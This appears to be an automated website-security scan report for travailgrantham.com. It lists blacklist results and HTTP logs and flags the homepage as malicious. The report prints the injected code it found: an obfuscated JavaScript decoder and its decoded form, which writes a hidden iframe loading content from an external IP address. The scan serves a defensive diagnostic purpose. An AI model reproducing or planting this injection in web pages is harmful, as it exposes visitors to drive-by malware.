Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=travailgrantham.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://travailgrantham.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://travailgrantham.com/ | 200 OK Content-Length: 9343 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function c1200847515n490ff3b344107(n490ff3b3448ec){ var n490ff3b3450d0=16; return (parseInt(n490ff3b3448ec,n490ff3b3450d0));}function n490ff3b346099(n490ff3b34648c){ function n490ff3b347058(){return 2;} var n490ff3b346873='';n490ff3b347827=String.fromCharCode;for(n490ff3b346c66=0;n490ff3b346c66<n490ff3b34648c.length;n490ff3b346c66+=n490ff3b347058()){ n490ff3b346873+=(n490ff3b347827(c1200847515n490ff3b344107(n490ff3b34648c.substr(n490ff3b346c66,n490ff3b347058()))));}return n490ff3b346873;} var Decoded script: function check_content(){var i=0;while(document.getElementsByTagName('iframe').length){var el=document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1'){el.parentNode.removeChild(el);}else i++;}}check_content(); if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%37%39%2e%31%33%32%2e%32%31%31%2e%33%30%2f%68%65%69%2f%3f%74%3d%32%34%27%20%77%69%64%74%68%3d%35%32%30%20%68%65%69%67%68%74%3d%32%36%30%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true; Antivirus reports:
| ||
http://travailgrantham.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: travailgrantham.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 01:13:46 GMT
Accept-Ranges: bytes
ETag: "9986b0a8-247f-45ad3fc663a80"
Server: Apache
Content-Length: 9343
Content-Type: text/html
Last-Modified: Tue, 04 Nov 2008 02:40:26 GMT
...9343 bytes of data.
GET / HTTP/1.1
Host: travailgrantham.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 01:13:46 GMT
Accept-Ranges: bytes
ETag: "9986b0a8-247f-45ad3fc663a80"
Server: Apache
Content-Length: 9343
Content-Type: text/html
Last-Modified: Tue, 04 Nov 2008 02:40:26 GMT
...9343 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: travailgrantham.com
Referer: http://www.google.com/search?q=travailgrantham.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: travailgrantham.com
Referer: http://www.google.com/search?q=travailgrantham.com
Result:
The result is similar to the first query. There are no suspicious redirects found.